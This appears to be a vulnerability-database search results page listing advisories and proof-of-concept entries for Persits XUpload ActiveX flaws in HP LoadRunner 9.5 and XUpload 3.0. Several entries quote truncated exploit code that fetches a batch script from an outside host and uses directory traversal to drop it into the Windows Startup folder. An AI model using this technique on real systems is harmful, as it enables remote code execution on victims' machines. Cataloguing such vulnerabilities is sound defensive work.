9 matches found
Directory traversal
Directory traversal vulnerability in the Persits.XUpload.2 ActiveX control XUpload.ocx in HP LoadRunner 9.5 allows remote attackers to create arbitrary files via .. backwards slash dot dot sequences in the third argument to the MakeHttpRequest method...
CVE-2009-3693
CVE-2009-3693 involves a directory traversal in Persits.XUpload.2 ActiveX control (XUpload.ocx) shipped with HP LoadRunner 9.5. The flaw arises in the MakeHttpRequest method, where sequences like "..\" can cause arbitrary files to be created on the target. Public details describe this as a write-...
HP LoadRunner 9.5 File Creation
' http://retrogod.altervista.org/sh9232.txt , a batch script that starts calc.exe XUPLOADLib.Server = "retrogod.altervista.org" XUPLOADLib.Script = "sh9232.txt" ' place it in the Startup folder, italian path, change for your os Method="" Params="" Path="..\..\..\Documents and Settings\All...
HP LoadRunner 9.5 - Remote file creation (PoC)
' http://retrogod.altervista.org/sh9232.txt , a batch script that starts calc.exe XUPLOADLib.Server = "retrogod.altervista.org" XUPLOADLib.Script = "sh9232.txt" ' place it in the Startup folder, italian path, change for your os Method="" Params="" Path="..\..\..\Documents and Settings\All...
HP LoadRunner 9.5 remote file creation PoC
No description provided by source. !-- HP LoadRunner 9.5 Persits.XUpload.2 control XUpload.ocx MakeHttpRequest remote file creation poc IE 8 by Nine:Situations:Group::pyrokinesis CLSID: E87F6C8E-16C0-11D3-BEF7-009027438003 Progid: Persits.XUpload.2 Binary Path:...
HP LoadRunner 9.5 remote file creation PoC
Exploit for unknown platform in category dos / poc ========================================== HP LoadRunner 9.5 remote file creation PoC ========================================== Title: HP LoadRunner 9.5 remote file creation PoC CVE-ID: OSVDB-ID: Author: Pyrokinesis Published: 2009-09-29 Verifie...
Persits Software XUpload AddFile()方式远程栈溢出漏洞
BUGTRAQ ID: 27456 XUpload是功能强大的客户端上传ActiveX控件,允许用户同时上传多个文件。 XUpload的ActiveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。 XUpload的Persits.XUpload.2 ActiveX控件(XUpload.ocx)没有正确地处理传送给AddFile方式的输入参数,如果用户受骗访问了恶意网页并向该方式传送了超长字符串参数的话,就可能触发栈溢出,导致执行任意指令。 Persits XUpload 3.0.0.4 Persits XUpload 2.1.0.1 厂商补丁: Persits...
CVE-2008-0492
Stack-based buffer overflow in the Persits.XUpload.2 ActiveX control in XUpload.ocx 3.0.0.4 and earlier in Persits XUpload 3.0 allows remote attackers to execute arbitrary code via a long argument to the AddFile method. NOTE: some of these details are obtained from third party information...
CVE-2008-0492
CVE-2008-0492 affects the Persits XUpload ActiveX control (XUpload.ocx 3.0.0.4 and earlier). A stack-based buffer overflow is triggered by a long argument to the AddFile method, allowing remote code execution. The CVSS notes a network vector, no authentication, and partial impact to confidentiali...